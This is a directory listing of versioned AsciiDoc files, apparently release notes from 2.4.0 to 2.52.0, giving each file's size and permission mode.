2.38.4.adoc File 295 B 0644
2.38.5.adoc File 311 B 0644
2.39.0.adoc File 12.85 KB 0644
2.39.1.adoc File 167 B 0644
2.39.2.adoc File 304 B 0644
2.39.3.adoc File 2.29 KB 0644
2.39.4.adoc File 2.58 KB 0644
2.39.5.adoc File 1.06 KB 0644
2.4.0.adoc File 21.59 KB 0644
2.4.1.adoc File 1.62 KB 0644
2.4.10.adoc File 711 B 0644
2.4.11.adoc File 424 B 0644
2.4.12.adoc File 479 B 0644
2.4.2.adoc File 1.91 KB 0644
2.4.3.adoc File 2.99 KB 0644
2.4.4.adoc File 1.2 KB 0644
2.4.5.adoc File 1.04 KB 0644
2.4.6.adoc File 744 B 0644
2.4.7.adoc File 2.16 KB 0644
2.4.8.adoc File 704 B 0644
2.4.9.adoc File 284 B 0644
2.40.0.adoc File 12.83 KB 0644
2.40.1.adoc File 329 B 0644
2.40.2.adoc File 274 B 0644
2.40.3.adoc File 1.06 KB 0644
2.40.4.adoc File 180 B 0644
2.41.0.adoc File 17.08 KB 0644
2.41.1.adoc File 288 B 0644
2.41.2.adoc File 1.06 KB 0644
2.41.3.adoc File 226 B 0644
2.42.0.adoc File 14.9 KB 0644
2.42.1.adoc File 3.36 KB 0644
2.42.2.adoc File 297 B 0644
2.42.3.adoc File 1.06 KB 0644
2.42.4.adoc File 240 B 0644
2.43.0.adoc File 13.68 KB 0644
2.43.1.adoc File 3.27 KB 0644
2.43.2.adoc File 1.37 KB 0644
2.43.3.adoc File 357 B 0644
2.43.4.adoc File 306 B 0644
2.43.5.adoc File 1.06 KB 0644
2.43.6.adoc File 249 B 0644
2.43.7.adoc File 2.95 KB 0644
2.44.0.adoc File 13.4 KB 0644
2.44.1.adoc File 315 B 0644
2.44.2.adoc File 1.06 KB 0644
2.44.3.adoc File 258 B 0644
2.44.4.adoc File 304 B 0644
2.45.0.adoc File 20.92 KB 0644
2.45.1.adoc File 324 B 0644
2.45.2.adoc File 1.06 KB 0644
2.45.3.adoc File 4.28 KB 0644
2.45.4.adoc File 317 B 0644
2.46.0.adoc File 18.34 KB 0644
2.46.1.adoc File 2.83 KB 0644
2.46.2.adoc File 883 B 0644
2.46.3.adoc File 276 B 0644
2.46.4.adoc File 326 B 0644
2.47.0.adoc File 13.64 KB 0644
2.47.1.adoc File 1.02 KB 0644
2.47.2.adoc File 285 B 0644
2.47.3.adoc File 335 B 0644
2.48.0.adoc File 12.65 KB 0644
2.48.1.adoc File 295 B 0644
2.48.2.adoc File 344 B 0644
2.49.0.adoc File 12.07 KB 0644
2.49.1.adoc File 528 B 0644
2.5.0.adoc File 25.54 KB 0644
2.5.1.adoc File 2.79 KB 0644
2.5.2.adoc File 2.59 KB 0644
2.5.3.adoc File 565 B 0644
2.5.4.adoc File 709 B 0644
2.5.5.adoc File 420 B 0644
2.5.6.adoc File 475 B 0644
2.50.0.adoc File 17.71 KB 0644
2.50.1.adoc File 361 B 0644
2.51.0.adoc File 14.46 KB 0644
2.51.1.adoc File 4.03 KB 0644
2.51.2.adoc File 1.84 KB 0644
2.52.0.adoc File 18.54 KB 0644
2.6.0.adoc File 16.05 KB 0644
2.6.1.adoc File 705 B 0644
2.6.2.adoc File 2.62 KB 0644
2.6.3.adoc File 4.79 KB 0644
2.6.4.adoc File 2.11 KB 0644
2.6.5.adoc File 2.48 KB 0644
2.6.6.adoc File 420 B 0644
2.6.7.adoc File 475 B 0644
2.7.0.adoc File 17.09 KB 0644
2.7.1.adoc File 3.45 KB 0644
2.7.2.adoc File 1.7 KB 0644
2.7.3.adoc File 2.54 KB 0644
2.7.4.adoc File 420 B 0644
2.7.5.adoc File 544 B 0644
2.7.6.adoc File 951 B 0644
2.8.0.adoc File 19.22 KB 0644
2.8.1.adoc File 255 B 0644
2.8.2.adoc File 2.64 KB 0644
2.8.3.adoc File 4.33 KB 0644
2.8.4.adoc File 2.99 KB 0644
2.8.5.adoc File 475 B 0644
2.8.6.adoc File 122 B 0644
2.9.0.adoc File 21.32 KB 0644
2.9.1.adoc File 4.81 KB 0644
2.9.2.adoc File 427 B 0644
2.9.3.adoc File 7.29 KB 0644
2.9.4.adoc File 4.28 KB 0644
2.9.5.adoc File 122 B 0644